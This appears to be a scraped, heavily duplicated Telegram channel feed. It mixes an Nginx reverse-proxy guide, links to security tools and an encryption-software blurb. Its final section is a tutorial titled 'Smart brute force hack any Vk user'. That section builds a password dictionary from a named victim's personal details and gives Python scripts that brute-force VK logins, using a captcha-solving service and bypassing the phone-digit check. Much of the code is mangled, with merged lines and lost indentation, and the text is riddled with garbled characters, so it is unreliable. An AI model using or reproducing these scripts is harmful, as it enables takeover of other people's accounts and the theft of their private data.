Forwarded from UNDERCODE NEWS
Siemens, SAP and BMW have teamed up to push Google and Amazon out of the German car industry.
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
Setup your own webhost:
Step 1: Install Nginx
Open the terminal application and then open the file /etc/apt/source.list in your favorite text editor and then add the below-given lines at the end of this file. In this line, you need to replace the βCODENAMEβ with your Ubuntu release, which you are using on your system. For example, we have a Ubuntu 20.04 focal fossa on this system. Sp, insert Focal to replace the βCODENAMEβ.
deb http://nginx.org/packages/mainline/ubuntu/ CODENAME nginx
deb-src https://nginx.org/packages/mainline/ubuntu/ <CODENAME> nginx
Next, you have to import the following packages repository signing key and then add it to the apt repository:
$ sudo wget http://nginx.org/keys/nginx_signing.key
$ sudo apt-key add nginx_signing.key
Now, update apt manager packages and install the latest release of Nginx on your system from the official apt repository by running the following command:
$ sudo apt update
$ sudo apt install nginx
Now, start and enabled the Nginx server by using the following commands:
$ sudo systemctl start nginx
$ sudo systemctl enable nginx
$ sudo systemctl status nginx
Step 2: Configurations for Nginx Reverse Proxy
Create a new configuration file custom_proxy /etc/nginx/conf.d/custom_proxy.conf and then paste the following lines of code in it:
server {
listen 80;
listen [::]:80;
server_name myexample.com;
location / {
proxy_pass http://localhost:3000/;
}
}
The directive βproxy_passβ specified inside the location makes this configuration as reverse proxy. This line proxy_pass http://localhost:3000/ directs all requests that match with location root/path must be forwarded to the port 3000 on localhost where your domain website is running.
To activate and link the new configuration file run the below mentioned command:
$ ln -s /etc/nginx/conf.d/custom_server.conf
Step 3: Test Configurations
Now, test the above configurations by using the following command:
$ sudo nginx -t
After successfully testing, if no bug is reported then, reload the new Nginx configuration.
$ sudo nginx -s reload
Configure Buffers
The above configurations are enough to create a basic reverse proxy server. but, for complex applications, you need to enable some advanced options, which are given below:
location / {
proxy_pass http://localhost:3000/;
proxy_buffering off;
}
Configure-Request headers
location / {
proxy_pass http://localhost:3000/;
proxy_set_header X-Real-IP $remote_addr;
}
β β β Uππ»βΊπ«Δπ¬πβ β β β
Setup your own webhost:
Step 1: Install Nginx
Open the terminal application and then open the file /etc/apt/source.list in your favorite text editor and then add the below-given lines at the end of this file. In this line, you need to replace the βCODENAMEβ with your Ubuntu release, which you are using on your system. For example, we have a Ubuntu 20.04 focal fossa on this system. Sp, insert Focal to replace the βCODENAMEβ.
deb http://nginx.org/packages/mainline/ubuntu/ CODENAME nginx
deb-src https://nginx.org/packages/mainline/ubuntu/ <CODENAME> nginx
Next, you have to import the following packages repository signing key and then add it to the apt repository:
$ sudo wget http://nginx.org/keys/nginx_signing.key
$ sudo apt-key add nginx_signing.key
Now, update apt manager packages and install the latest release of Nginx on your system from the official apt repository by running the following command:
$ sudo apt update
$ sudo apt install nginx
Now, start and enabled the Nginx server by using the following commands:
$ sudo systemctl start nginx
$ sudo systemctl enable nginx
$ sudo systemctl status nginx
Step 2: Configurations for Nginx Reverse Proxy
Create a new configuration file custom_proxy /etc/nginx/conf.d/custom_proxy.conf and then paste the following lines of code in it:
server {
listen 80;
listen [::]:80;
server_name myexample.com;
location / {
proxy_pass http://localhost:3000/;
}
}
The directive βproxy_passβ specified inside the location makes this configuration as reverse proxy. This line proxy_pass http://localhost:3000/ directs all requests that match with location root/path must be forwarded to the port 3000 on localhost where your domain website is running.
To activate and link the new configuration file run the below mentioned command:
$ ln -s /etc/nginx/conf.d/custom_server.conf
Step 3: Test Configurations
Now, test the above configurations by using the following command:
$ sudo nginx -t
After successfully testing, if no bug is reported then, reload the new Nginx configuration.
$ sudo nginx -s reload
Configure Buffers
The above configurations are enough to create a basic reverse proxy server. but, for complex applications, you need to enable some advanced options, which are given below:
location / {
proxy_pass http://localhost:3000/;
proxy_buffering off;
}
Configure-Request headers
location / {
proxy_pass http://localhost:3000/;
proxy_set_header X-Real-IP $remote_addr;
}
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Some security tools :
[DefenseMatrix](https://github.com/K4YT3X/DefenseMatrix) | Full security solution for Linux Servers
[Kernelpop](https://github.com/spencerdodd/kernelpop) | kernel privilege escalation enumeration and exploitation framework
[Lynis](https://github.com/CISOfy/lynis) | Security auditing tool for Linux, macOS, and UNIX-based systems.
[linux-explorer](https://github.com/intezer/linux-explorer) | Easy-to-use live forensics toolbox for Linux endpoints
[Katoolin](https://github.com/LionSec/katoolin) | Automatically install all Kali linux tools in distros like Ubuntu
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Some security tools :
[DefenseMatrix](https://github.com/K4YT3X/DefenseMatrix) | Full security solution for Linux Servers
[Kernelpop](https://github.com/spencerdodd/kernelpop) | kernel privilege escalation enumeration and exploitation framework
[Lynis](https://github.com/CISOfy/lynis) | Security auditing tool for Linux, macOS, and UNIX-based systems.
[linux-explorer](https://github.com/intezer/linux-explorer) | Easy-to-use live forensics toolbox for Linux endpoints
[Katoolin](https://github.com/LionSec/katoolin) | Automatically install all Kali linux tools in distros like Ubuntu
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
k4yt3x/defense-matrix
Express security essentials deployment for Linux Servers - k4yt3x/defense-matrix
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Use computer file encryption software to implement SD card encryption and protect SD card file security.
https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview
Currently, there are many computer file encryption software in China, which not only support U disk encryption, but also mostly support SD card file encryption, and the operation is relatively simple. The author used a " Encryption Software" (download address: which is a very simple and easy to use, and at the same time very powerful computer file encryption software. Compared with similar computer file encryption software, it has the following characteristics:
1. You can encrypt computer hard drives, encrypt disk files, and also hide disks and hidden disk folders.
2. Not only can encrypt disk files, but also U disk files, realize U disk encryption, and encrypt USB storage device files.
3. You can encrypt the SD card and set a password for the SD card. At the same time, SD card files can also be encrypted.
4. The only way to control the access rights of encrypted files is to allow only the content of encrypted files to be read but not to copy encrypted files, only to modify encrypted files but not to delete encrypted files, only to open encrypted files but not to save as local disk , And prohibit dragging encrypted files, prohibit printing encrypted files, etc.
Regarding SD card files, through the " Computer File Encryption Software", you can not only set a password for the SD card, but also encrypt the files in the SD card and control the access rights after opening the SD card files.
> for android:
https://play.google.com/store/apps/details?id=com.file_encryption.android&hl=en&gl=US
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Use computer file encryption software to implement SD card encryption and protect SD card file security.
https://docs.microsoft.com/en-us/windows/security/information-protection/bitlocker/bitlocker-overview
Currently, there are many computer file encryption software in China, which not only support U disk encryption, but also mostly support SD card file encryption, and the operation is relatively simple. The author used a " Encryption Software" (download address: which is a very simple and easy to use, and at the same time very powerful computer file encryption software. Compared with similar computer file encryption software, it has the following characteristics:
1. You can encrypt computer hard drives, encrypt disk files, and also hide disks and hidden disk folders.
2. Not only can encrypt disk files, but also U disk files, realize U disk encryption, and encrypt USB storage device files.
3. You can encrypt the SD card and set a password for the SD card. At the same time, SD card files can also be encrypted.
4. The only way to control the access rights of encrypted files is to allow only the content of encrypted files to be read but not to copy encrypted files, only to modify encrypted files but not to delete encrypted files, only to open encrypted files but not to save as local disk , And prohibit dragging encrypted files, prohibit printing encrypted files, etc.
Regarding SD card files, through the " Computer File Encryption Software", you can not only set a password for the SD card, but also encrypt the files in the SD card and control the access rights after opening the SD card files.
> for android:
https://play.google.com/store/apps/details?id=com.file_encryption.android&hl=en&gl=US
β β β Uππ»βΊπ«Δπ¬πβ β β β
Docs
BitLocker Overview
Explore BitLocker deployment, configuration, and recovery options for IT professionals and device administrators.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦"Smart" brute force hack any Vk user !
A method designed for average users. For him, we will need a special dictionary tailored for a specific person. Let's figure out the structure of our dictionary:
Personal data. This includes the date of birth (11/17/1992 = 1711, 1992, 17111992), age (1992, 2017 = 2017, 1992, 24), first name (Stas = stas, ctac) and last name (Ivanov = ivanov).
Accounts from other social. networks and mail services (twitter.com/stasik_ku, facebook.com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
Hobbies (football, swimming, youth = football, swimming, molodejka, molodegka).
There is also a VK page, which says which passwords should be specified, which characters are possible and the most common passwords.
The result is a sheet of 14 lines. But we still need to create password combinations from it that our victim could create.
I present to you my small python script that does this.
#! coding:utf-8 import sys,os
razdel = ['_',':',';']
def uniq(seq): seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
def brute_words(words): new_words = []
for i in words: new_words.append(i)
new_words.append(i[0].upper() + i[1:])
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper())
new_words.append(i.upper())
for j in spisok: new_words.append(i + j)
for m in razdel: new_words.append(j + m + i)
new_words.append(j + i)
new_words.append(i * 2 + j)
new_words.append(j * 2 + i)
new_words.append(i[0].upper() + i[1:] + j)
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j)
return uniq(new_words)
def generate(words_file): o = open(words_file, 'r')
words = o.read().splitlines()for i in brute_words(words): print(i)
def main(): try: argv1 = sys.argv[1]
generate(argv1)
except IndexError: print("ΠΡΠΆΠ½ΠΎ ΡΠΊΠ°Π·Π°ΡΡ ΡΠ°ΠΉΠ»")
except IOError: print("ΠΠ΅Ρ ΡΠ°ΠΊΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π°")if name == "main": main()
Out of 14, 1272 options were obtained. Let me give you a part.
Molodegkactac
MolodegkActac
molodejka_molodegka
Stasss92molodejka
stasss92molodegka
molodegka_stasss92
molodegka:stasss92
molodegka;stasss92
stasss1992swimming
swimming_stasss1992
Kurayginctac
KuraygiNctac
kurayginkuraygin
kuraygin_kuraygin
molodegka171119921711199217111992molodegka
molodegkamolodegka1711199224 1711_24
Great, now we will automate the search for passwords through the mobile version of VK with a small script.
π¦"Smart" brute force hack any Vk user !
A method designed for average users. For him, we will need a special dictionary tailored for a specific person. Let's figure out the structure of our dictionary:
Personal data. This includes the date of birth (11/17/1992 = 1711, 1992, 17111992), age (1992, 2017 = 2017, 1992, 24), first name (Stas = stas, ctac) and last name (Ivanov = ivanov).
Accounts from other social. networks and mail services (twitter.com/stasik_ku, facebook.com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
Hobbies (football, swimming, youth = football, swimming, molodejka, molodegka).
There is also a VK page, which says which passwords should be specified, which characters are possible and the most common passwords.
The result is a sheet of 14 lines. But we still need to create password combinations from it that our victim could create.
I present to you my small python script that does this.
#! coding:utf-8 import sys,os
razdel = ['_',':',';']
def uniq(seq): seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))]
def brute_words(words): new_words = []
for i in words: new_words.append(i)
new_words.append(i[0].upper() + i[1:])
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper())
new_words.append(i.upper())
for j in spisok: new_words.append(i + j)
for m in razdel: new_words.append(j + m + i)
new_words.append(j + i)
new_words.append(i * 2 + j)
new_words.append(j * 2 + i)
new_words.append(i[0].upper() + i[1:] + j)
new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j)
return uniq(new_words)
def generate(words_file): o = open(words_file, 'r')
words = o.read().splitlines()for i in brute_words(words): print(i)
def main(): try: argv1 = sys.argv[1]
generate(argv1)
except IndexError: print("ΠΡΠΆΠ½ΠΎ ΡΠΊΠ°Π·Π°ΡΡ ΡΠ°ΠΉΠ»")
except IOError: print("ΠΠ΅Ρ ΡΠ°ΠΊΠΎΠ³ΠΎ ΡΠ°ΠΉΠ»Π°")if name == "main": main()
Out of 14, 1272 options were obtained. Let me give you a part.
Molodegkactac
MolodegkActac
molodejka_molodegka
Stasss92molodejka
stasss92molodegka
molodegka_stasss92
molodegka:stasss92
molodegka;stasss92
stasss1992swimming
swimming_stasss1992
Kurayginctac
KuraygiNctac
kurayginkuraygin
kuraygin_kuraygin
molodegka171119921711199217111992molodegka
molodegkamolodegka1711199224 1711_24
Great, now we will automate the search for passwords through the mobile version of VK with a small script.
"Smart" brute force hack any Vk user ! partβ-2
#! coding: utf8
import grab, re, urllib2from antigate import AntiGatefrom grab import GrabTimeoutErrorfrom time import sleep
cap_key = '123 '
def anti(key, file): Captcha Ρ Antigate
try:
try: data = AntiGate(key, file)
return data
except KeyboardInterrupt:
print("name")
except:
anti(key, file)
def save(url, file): #L
site = urllib2.urlopen(url)
f = open(file, 'wb')
f.write(site.read())
def cap_solve(img):
save(img, 'captcha.jpg')
key = anti(cap_key, 'captcha.jpg')
return keydef brute(login, passwords, save):
out = open(save, 'w')
psswrds = open(passwords,'r')
try:
int(login)
prefix = True
except:
prefix = False
g = grab.Grab()
g.go('http://m.vk.com')
for line in psswrds:
psswrd = line.rstrip('\r\n')
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.submit()
if g.doc.text_search(u'captcha'):
all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
captcha = '' + all_captchas
key = cap_solve(captcha)
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.set_input('captcha_key', str(key))
g.doc.submit()
print("cap")
if 'ΠΠΎΠ΄ΡΠ²Π΅ΡΠ΄ΠΈΡΡ' in g.response.body:
if prefix:
prefix1 = g.doc.rex_search('\+[0-9]*').group(0)
prefix2 = g.doc.rex_search(' [0-9]*').group(0)
pre1 = re.findall('[0-9]{1,}', prefix1)[0]
pre2 = re.findall('[0-9]{1,}', prefix2)[0]
login = login.replace(pre1, '')
login = login.replace(pre2, '')
g.set_input('code', login)
g.submit()
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
else:
out.write(login + ':' + psswrd + '\n')
else:
if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':
print(login + ':' + psswrd + '--fail')
else:
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
out.close()
psswrds.close()
Naturally, the example is not optimized. You can also add proxies, multithreading and other goodies, but you will do it yourself if it is interesting. But the script is able to enter the missing digits in VKontakte protection itself when entering from another country, and also, using Antigate, easily enters Captch'i that appear after 5-6 attempts to enter from one IP.
β β β Uππ»βΊπ«Δπ¬πβ β β β
#! coding: utf8
import grab, re, urllib2from antigate import AntiGatefrom grab import GrabTimeoutErrorfrom time import sleep
cap_key = '123 '
def anti(key, file): Captcha Ρ Antigate
try:
try: data = AntiGate(key, file)
return data
except KeyboardInterrupt:
print("name")
except:
anti(key, file)
def save(url, file): #L
site = urllib2.urlopen(url)
f = open(file, 'wb')
f.write(site.read())
def cap_solve(img):
save(img, 'captcha.jpg')
key = anti(cap_key, 'captcha.jpg')
return keydef brute(login, passwords, save):
out = open(save, 'w')
psswrds = open(passwords,'r')
try:
int(login)
prefix = True
except:
prefix = False
g = grab.Grab()
g.go('http://m.vk.com')
for line in psswrds:
psswrd = line.rstrip('\r\n')
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.submit()
if g.doc.text_search(u'captcha'):
all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
captcha = '' + all_captchas
key = cap_solve(captcha)
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.set_input('captcha_key', str(key))
g.doc.submit()
print("cap")
if 'ΠΠΎΠ΄ΡΠ²Π΅ΡΠ΄ΠΈΡΡ' in g.response.body:
if prefix:
prefix1 = g.doc.rex_search('\+[0-9]*').group(0)
prefix2 = g.doc.rex_search(' [0-9]*').group(0)
pre1 = re.findall('[0-9]{1,}', prefix1)[0]
pre2 = re.findall('[0-9]{1,}', prefix2)[0]
login = login.replace(pre1, '')
login = login.replace(pre2, '')
g.set_input('code', login)
g.submit()
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
else:
out.write(login + ':' + psswrd + '\n')
else:
if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':
print(login + ':' + psswrd + '--fail')
else:
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
out.close()
psswrds.close()
Naturally, the example is not optimized. You can also add proxies, multithreading and other goodies, but you will do it yourself if it is interesting. But the script is able to enter the missing digits in VKontakte protection itself when entering from another country, and also, using Antigate, easily enters Captch'i that appear after 5-6 attempts to enter from one IP.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Vk
VK | Welcome!
VK is the largest European social network with more than 100 million active users. Our goal is to keep old friends, ex-classmates, neighbors and colleagues in touch.